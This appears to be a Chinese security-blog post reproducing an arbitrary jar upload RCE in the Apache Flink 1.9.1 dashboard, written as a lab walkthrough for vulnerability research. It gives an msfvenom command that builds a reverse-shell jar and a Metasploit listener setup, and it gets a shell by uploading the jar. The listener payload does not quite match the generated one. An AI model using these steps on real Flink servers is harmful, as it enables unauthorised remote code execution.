专栏名称: TimelineSec
安全圈必备公众号之一!专注于最新漏洞复现!内含漏洞时间线工具靶场等干货!记录每一个漏洞,捕捉安全的每一瞬间!
目录
相关文章推荐
macrozheng  ·  300 秒到 4 秒,如何将 MySQL ... ·  18 小时前  
数据中心运维管理  ·  探索数据中心的多模光纤距离限制 ·  4 天前  
数据中心运维管理  ·  DeepSeek加速大马数据中心发展 ·  3 天前  
程序员鱼皮  ·  MyBatis 批量操作的 5 ... ·  昨天  
程序员鱼皮  ·  MyBatis 批量操作的 5 ... ·  昨天  
51好读  ›  专栏  ›  TimelineSec

Apache Flink 任意 Jar 包上传致 RCE 漏洞复现

TimelineSec  · 公众号  ·  · 2019-11-14 00:07

正文

本公众号专注于最新漏洞复现,欢迎关注!

----------------------------------------------------------------------------------------

本文作者:DesM0nd(Timeline Sec核心成员)

本文共571字,阅读大约需要2分钟


0x00 简介


Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。 基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。


0x01 漏洞概述


攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。


0x02 影响版


至目前最新版本Apache Flink 1.9.1


0x03 环境搭建


测试环境: Flink 1.9.1 java8+

Apache Flink 1.9.1安装包下载

https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz


解压后进入bin文件夹,运行./start-cluster.sh

验证Flink启动之后,默认web 端口8081是否正常



访问http://ip:8081/可看到环境页面




0x04 漏洞利用


1、上传msf生成的jar包

生成rce.jar文件

msfvenom -p java/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=8087 -f jar > rce.jar



2、配置msf监听

use exploit/multi/handlerset payload java/shell/reverse_tcpset LHOST 127.0.0.1set LPORT 8087show optionsrun


在Submit New Job处上传rec.jar文件,点击submit




成功反弹shell,执行id可看到结果







请到「今天看啥」查看全文